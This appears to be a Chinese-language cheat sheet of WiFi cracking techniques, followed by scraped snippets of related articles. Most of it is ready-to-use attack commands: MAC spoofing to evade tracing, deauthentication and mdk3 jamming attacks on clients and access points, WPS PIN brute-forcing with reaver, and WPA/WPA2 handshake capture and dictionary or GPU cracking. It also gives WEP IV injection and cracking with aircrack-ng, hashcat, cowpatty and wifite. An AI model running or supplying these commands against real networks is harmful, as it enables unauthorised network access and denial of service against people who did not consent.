一些Wifi破解姿势

wlan0:无线网卡设备

BSSID/AP‘s MAC:目标路由器的mac地址

Client‘s MAC:连接到此wifi客户端的mac地址

ESSID:这个无线的名字

    CH[X] 扫描的信道号,因为airodump是跳频扫描的,会一直扫描13个信道。后面是你的扫描时间和你本地时间。

    BSSID:路由器MAC地址

    PWR:网卡的信号水平,新号越好数值越大,但是例如第一个出现‘-1’说明该客户端不在我的监听范围内。

    Beacons:就是Beacon数据的速率

    #Date:被捕获的数据分组数量

    #/S :十秒内的捕获数据分组量

    CH:信道号,是从beacon包里面获取的(在企业无线渗透中提到过beacon内容)

    MB:是一直支持速率吧,关于802.11标准的,不过一般是用来看是否开启wps的,一般情况下54e.后面有.的都是开启的,但是也不完全。

    ENC:(Encryption )所使用的加密算法体系。Open=无加密,WPA=WPA/WPA2=WPA2

    CIPHER:加密算法,如CCMP,TKIP….

    Auth:(Authentiction)认证协议:如:PSK:(PWA/WPA2的预共享密钥)或是OPEN(WEP开放)MGT(则是802.1x、eap、radius)因为MGT是独立认证服务器

    ESSID:就是SSID

    Station:客户端MAC

    Notassociated:就是证明客户端没跟AP连上。Associated认证在上一篇文章提到过。

    Lost:是10秒丢包数据

    Rate:传输速率

    Probe:就是一个client试图去连目标AP但没连上

    Frame:通信帧数

相关命令

保护措施
macchanger -s  [网卡]             #查看网卡当前的MAC
macchanger -m 想伪造的MAC 网卡         #伪造MAC
macchanger  -A  wlan0                 #修改网卡mac地址为随机地址

vi /etc/hostname  #修改主机名
echo 1 >/proc/sys/net/ipv4/icmp_echo_ignore_all  #防止ping
重启网络连接:sudo /etc/init.d/network-manager restart

从混杂模式中恢复ifconfig wlan0 downiwconfig wlan0 mode managedifconfig wlan0 up
无线DOS
aireplay-ng -0 3 –a BSSID –c clientMAC wlan0
mdk3 mon0 a –a AP‘MAC -s 80
mdk3 mon0 d -c 信道  #攻击client MAC
mdk3 mon0 b –g –c 11 –h 7      #发动虚假AP信号进行干扰
mdk3 mon0 b –n ESSID –g –c 11  #对指定名称(ESSID)发送干扰,-g是伪装为54M的标准的802.11无线网络,-c频道

Wifi破解

Pin码破解(路由器要开启wps功能)

网卡开启混杂模式
  ifconfig wlan0 down
  iwconfig wlan0 mode monitor
  ifconfig wlan0 up
扫描开启wps的AP  wash -i wlan0 -C               

破解ping码  reaver -i 混杂网卡名 -c 信道 -b AP‘MAC -a -S -vv -d 9 -t 9 (混杂模式使用)
目标信号很好: reaver -i wlan0 -b MAC -a -S -vv -d0 -c 1
目标信号普通: reaver -i wlan0 -b MAC -a -S -vv -d2 -t 5 -c 1
目标信号一般: reaver -i wlan0 -b MAC -a -S -vv -d5 -c 1

通过pin码直接获取路由器密码  reaver -i 混杂网卡名 -b MAC -p PIN8位数


Aircrack-ng

WPA/WPA2(1)网卡开启混杂监听模式
  ifconfig wlan0 down   
  iwconfig wlan0 mode monitor
  ifconfig wlan0 up     --> wlan0

  或者:  airmon-ng start wlan0  --> wlan0mon  如果不行:  airmon-ng check kill  airmon-ng start wlan0
(2)探测无线网络  airodump-ng wlan0mon
  airodump-ng  -c 信道 -w 保存的数据包名 –-bssid  AP’MAC  wlan0mon  例:  airodump-ng -c 6 --bssid 69:71:5E:51:38:EE -w /home/OKing/wifi/FAST_33687 wlan0mon
(3)强制解除客户端认证  aireplay-ng  -0 攻击次数 -a AP’MAC  [-c 客户端MAC]  [-e bssid]  wlan0mon [--ignore-negative-one]  例:    aireplay-ng -0 10 -a 69:71:5E:51:38:EE -c 78:AF:8E:7D:8A:9D -e FAST_33687 wlan0mon    如果信道里有-1,则需要 --ignore-negative-one 参数        aireplay-ng -0 10 -a 69:71:5E:51:38:EE -c 78:AF:8E:7D:8A:9D -e "My WiFi" wlan0mon --ignore-negative-one
  在没有客户端连接的情况下,可使用假身份认证攻击(模拟用户认证连接,攻击这个模拟用户)
  aireplay-ng  --fakeauth  -q 10  -a AP‘MAC  -h 模拟用户的MAC
  aireplay-ng  --arpreplay  -b AP‘MAC  -h  模拟用户的MACs

(4)密码破解  aircrack-ng 数据包名.cap  –w 字典路径
  airdecap-ng -l -e bssid –p 密码数据包名.cap //破解出密码后,解析加密内容

WEP
(1)airmon-ng start wlan0 [信道]
 或  airmon-ng check kill
     airmon-g start wlan0   启动监听后的混杂模式网卡: wlan0mon
(2)airodump-ng wlan0mon0
(3)airodump-ng  -c 信道 -w 数据包名 [--bssid AP’MAC]  --ivs wlan0mon0
(4)aireplay-ng  -3  -b AP’MAC  -h客户端MAC  [-x 1024(每秒发送包数量)] wlan0mon0
(5) aircrack-ng 数据包名.ivs  –w 字典路径    (解密的报文ivs要20000以上)
(6) aircrack-ng  -x  -f 2 包名.ivs     -x 暴力破解  -f 2  复杂度为2
   airdecap-ng  –w 解密前的秘钥  数据包名.ivs
如:KEY FOUND! [31:32:33:34:35:36:37:38:39:30:61:61:61] (ASCII:1234560aaa) //蓝色部分是解密前的密钥

wesside –v AP’MAC –k 1(重发数据包次数) –i mon0    //aircrack-ng套件中的自动化破解weo加密wifi工具,但成功率较低tkiptun-ng  –a AP’MAC  -h 客户端MAC  网卡    //aircrack-ng套件中的自动化破解wpa/wpa2加密wifi的工具(可加参数:-m 最小数据包长度  -n 最大数据包长度)

辅助命令
airdecloack-ng  --bssid AP’MAC  --filters signal –i 包名.cap #过滤出指定AP报文数据(会生成*.pcap的报文)
ivstools  --convert  a.cap  b.ivs    //将cap数据包转换成ivs数据包
ivstools  --merge  a.ivs  b.ivs  ab.ivs     //将数据包过滤合并

握手包破解命令 
john --wordlist=password.lst --rules --stdout | aircrack-ng -e essid -w - xxx.cap
使用john在字典上执行排列匹配,将各种组合词提供给aircrack-ng破解使用 

pyrit -r xxx.cap -i password.lst attack_passthrough GPU加速破解 (time 程序/命令名 #计算程序执行时间) 

cowpatty -s ESSID -r xxx.cap -d /path/彩虹表路径 (若SSID中包含空格,要用引号) 

为cowpatty破解制作专用hash tables :
  genpmk -f 字典 -d 要生成的hash table -s ssid
很多组织都自己建立了wpa table库,也就是预先使用常见的essid生成hash table
如果要破解essid相同的无线密码,直接网上下载,无需自己再生成
国内比较有名的就是ZerOne团队针对国内常见essid生成的hash table


Wifite

命令行下wifi自动化破解工具

(1)开启网卡监听模式  ifconfig wlan1 down  iwconfig wlan1 mode monitor  ifconfig wlan1 up  或者: airmon-ng start wlan1(2)启动wifite,此时会自动加载混杂模式下的网卡,探测无线网络

    

     Ctrl + C 停止探测,尽量选择有client的无线进行破解。或者添"all"破解所有

    

(3)等待破解结果即可...


未完待续。。。

Fern-wifi-cracker

wpaclean out.cap in.cap             //整理包文件内容,保证它的格式内容与密码破解程序兼容
aircrack-ng out.cap -J out.hccap        //要把cap数据包转换成hccap数据包才能用oclHashcat破解
cudaHashcat-plus64.exe -m 2500 out.hccap   //破解WPAv2哈希

中间人攻击破解wifi

时间: 2024-09-30 05:23:12

一些Wifi破解姿势的相关文章

[WIFI]破解工具-BT4+unetbootin+spoonwep/wpa

一.首先下载这三个工具: 1.BT4正式版: 下载地址:http://ftp.heanet.ie/mirrors/backtrack/bt4-pre-final.iso 2.U盘启动制作工具:unetbootin-windows-356 下载地址:http://www.atuonce.cn/blog/attachments/month_0906/t2009621225526.rar 3.spoonwep-wpa破解工具用于BT4下的deb安装包 迅雷下载地址:(已经修正下载地址, 打开迅雷, 然

wifi破解不是真黑客不靠谱?

Wifi破解神器骗局:摆地摊+网络兜售 近日,"万能wifi密码破解器"风靡全国地摊,各地小贩开始兜售这种蹭网卡,声称可破解各种wifi密码,当场测试也是成功的,但是买主回家一个测试就发现魔力失效.此外,网络上也有售卖免费wifi上网接收器.卡皇等,其中也不乏欺诈陷阱. 真相:市民不免气愤,拆开一看神器竟是一个用USB供电的发光二极管,进价不够3.5元,挂上"万能wifi密码破解器"的头衔,竟卖到15.35或50元不等.摊贩的骗局就是,选中的wifi是通过身上携带的

ubuntu下aircrack-ng的wifi破解

首先安装aircrack-ng,apt-get install aircrack-ng. 然后打开shell,输入airmon-ng start wlan0. 输入airodump-ng mon0. 输入airodump-ng  -c 1(频道) -w wep.cap --bssid 74:25:8A:7B:59:C8(目标mac) mon0. 输入ifconfig wlan0 down. 输入aireplay-ng -1 0 -a 74:25:8A:7B:59:C8(目标mac) -h 90:

WIFI 破解(初级)

话不多说,先来看看字典破解 wpa2 的效果 =================================== ===============================================字典破解 wifi-wpa/wpa2目前最常用的加密类型此方法只适合破解弱口令其他暴力破解伤CPU/GPU===============================================1. 安装aircrack-ng   1. 直接使用apt-get,但有的软件仓库不是最

commview for wifi 破解无线

相信了解无线网络的读者都知道安全性是无线网络的先天不足,正是因为他的传播通过空气,所以信号很容易出现外泄问题,相比有线网络来说信号监听变得非常简单. 部分用户通过WEP加密的方式来保护网络通讯数据包避免被监听者破译,不过WEP加密在现今这个安全技术飞速发展的时代已经不再保险,网上也有很多介绍实 现无线WEP入侵的方法.今天笔者就再介绍一个更为精简的方法,让我们可以在五分钟之内实现无线WEP网络的入侵,将WEP加密密钥轻松还原出明文. 一,五分钟实现无线WEP入侵的特点:   众所周知WEP加密入

[HackWifi]wifi破解详解

每天都能看到有不少网友在回复论坛之前发布的一篇破解WiFi密码的帖子,并伴随各种疑问.今天流云就为大家准备一篇实战型的文章吧,详细图文从思维CDlinux U盘启动到中文设置,如何进行路由SSID扫描.WPA密码类型该如何破解.字典该怎样做(WEP加密的密码貌似可以直接破解不用字典)效果比BT8要强悍很多!这是一篇详细介绍WiFi密码破解的文章,准备好了吗? 好了,先说下提前要准备的东东吧:1.U盘一枚,最小1G空间.需进行格式化操作,提前保存内部文件.2.CDlinux镜像.帖子最后会提供一枚

实战-Fluxion与wifi热点伪造、钓鱼、中间人攻击、wifi破解

原作者:PG     整理:玄魂工作室-荣杰 目录: 0x00-Fluxion是什么 0x01-Fluxion工作原理 0x02-Kali上安装fluxion 0x03-Fluxion工具使用说明+实战破解wifi 小编在作者PG原稿上斗胆修改,”跪求”原作者赐风油精 0x00-Fluxion是什么 Fluxion是一个无线破解工具,这款软件可以帮你挤掉WiFi主人的网络让你自己登陆进去,而且WiFi主人怎么挤也挤不过你.这个工具有点像是Linset的翻版.但是与Linset比较起来,它有着更多

安全系列之wifi破解思路

声明:此文章仅供研究学习和技术交流,请勿用于破解他人 WIFI 密码!违反法律,一切后果自负! 一.准备工作 1. 硬件准备 无线网卡:一般笔记本自带的无线网卡不支持监听模式,所以要使用一个外置的无线网卡,这里推荐购买3070或者8187芯片的外置USB无线网卡,8187L芯片是一种内含集成电路的硅片,是一种大功率无线网卡的首脑部分,常被用做"蹭网卡"芯片.具有体积小,辐射大,使用价值高等特点. 2. 软件准备 操作系统: https://www.kali.org/downloads/

wifi 破解笔记

最近小夜刚刚学习了无线WiFi的密码破解,感觉很神奇,不过以下操作都是作为学习测试的内容进行的,希望志同道合的小伙伴切不要触碰法律的红线哦!       话不多说,直接上硬菜. 实验环境: 硬件需求:    一台笔记本 一部USB WIFI信号发射接收器 软件需求:    kali虚拟机 操作步骤: 一.插上USB WIFI信号发射接收器,打开kali虚拟机,选择添加USB WIFI信号发射接收器 二.打开终端,进行WIFI信号发射接收器启动,具体命令如下: step1: 查看网络网卡信息 #i